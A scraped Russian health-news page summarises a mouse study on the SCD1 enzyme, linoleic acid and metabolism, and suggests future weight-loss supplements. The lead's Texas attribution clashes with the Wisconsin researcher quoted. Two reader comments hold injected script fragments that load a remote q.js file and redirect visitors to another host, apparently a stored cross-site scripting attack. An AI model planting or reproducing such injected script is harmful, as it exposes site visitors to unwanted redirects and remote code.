Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Этот жир помогает похудет...  >>  Этот жир помогает похудеть
 
Обратная связь
 

Этот жир помогает похудеть

Размер шрифта
10 февраля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Специалисты из Техаса выяснили, что диета с повышенным содержанием определенного типа жира ускоряет обмен веществ и, таким образом, помогает похудеть.

Этот жир помогает похудеть

Исследование проводилось на генетически модифицированных мышах; результаты его лягут в основу разработки новых пищевых добавок, ускоряющих метаболизм и снижающих утомляемость мышц у людей.

«В мышечной ткани людей с ожирением содержится особый фермент, который расщепляет насыщенные жиры. Мы решили выяснить, в чем заключается его функция», – рассказывает Чед Пейтон, доцент отделения диетологии университета Висконсина (США).

С этой целью Пейтон и его коллеги вывели линию мышей, чьи мышцы постоянно продуцировали этот жирорасщепляющий фермент.

«Мы обнаружили, что у таких животных повышалась скорость обмена веществ, они потребляли намного больше энергии, чем дикие мыши», – говорит Пейтон.

Фермент, о котором идет речь, называется SCD1. Он запускает реакцию превращения насыщенных жиров в мононенасыщенные, которые намного легче перевариваются. Этот фермент в норме продуцируется клетками печени, и объемы этой продукции зависят от количества жира в пище. Также SCD1 присутствует в жировой ткани, однако в ней он синтезируется на постоянной основе.

«В мышцах же фермент появляется только в двух случаях: при значительной их натренированности и при общем ожирении», – добавляет Пейтон.

Изучив биохимический состав мышц экспериментальных животных, ученые обнаружили повышенное содержание полиненасыщенных жирных кислот, в особенности – линолевой. Поскольку линолевая кислота является незаменимым веществом, ее можно получить только с пищей. Это значит, что генетически модифицированные мыши ели больше, чем в норме. При этом, с другой стороны, они весили меньше и с большей эффективностью выполняли физические упражнения.

«Скажем, обычные мыши могу бегать в колесе примерно 7-10 минут, после чего устают. Наши животные могли делать это без устали на протяжении 70 минут!», – говорит Пейтон. «Это сподвигло нас изучить детальнее биохимические изменения, которые произошли в их мышечной ткани, что и привело к этому удивительному открытию».

Таким образом, увеличенная экспрессия SCD1 и повышенный аппетит приводили к тому, что в тканях накапливалось больше линолевой кислоты. Последняя активировала определенные участки ДНК, что приводило к увеличению количества митохондрий в клетке. Кроме того, повышалась продукция особых белков (термогенинов), которые способствуют повышенному тепловыделению за счет снижения эффективности окислительных процессов в митохондриях. Это вынуждает клетку ускорять метаболизм, чтобы достигать прежних уровней энергопроизводства.

«Человеческий организм хранит неиспользованную энергию в виде жира», – рассказывает Пейтон. «Нашим предкам это помогало выживать, но в сегодняшнем мире, в котором царит изобилие еды, этот механизм может привести патологическому ожирению».

«Конечно, мы не можем подвергнуть человека генным модификациям, как мышей», – продолжает он. «Однако есть и другой вариант».

С помощью пищевых добавок можно попробовать повлиять на ДНК и, таким образом, воспроизвести вышеописанный механизм. Тогда бы организм сжигал лишнюю энергию, вместо того, чтобы накапливать ее в виде «аппетитных» складок на животе и ягодицах. И скорее всего, такие добавки должны основываться как раз-таки на полиненасыщенных жирных кислотах. Но необходимы дальнейшие исследования на людях, чтобы достоверно это выяснить.

Другие материалы о лишнем весе и способах избавления от него в неограниченном количестве присутствуют на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:46

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Перекус, который заставит вас купить штаны на размер меньше в Новом году   Принюхайтесь! Ваш нос поможет вам похудеть   Жир на этой части тела приводит к смерти   Жир или сахар, кто делает нас толстыми  
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 

Слайдшоу

1
Может ли кофе сжечь жир?
Худшие советы для похудения. Часть 3
Стали ли вы жертвой худших советов для похудения?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.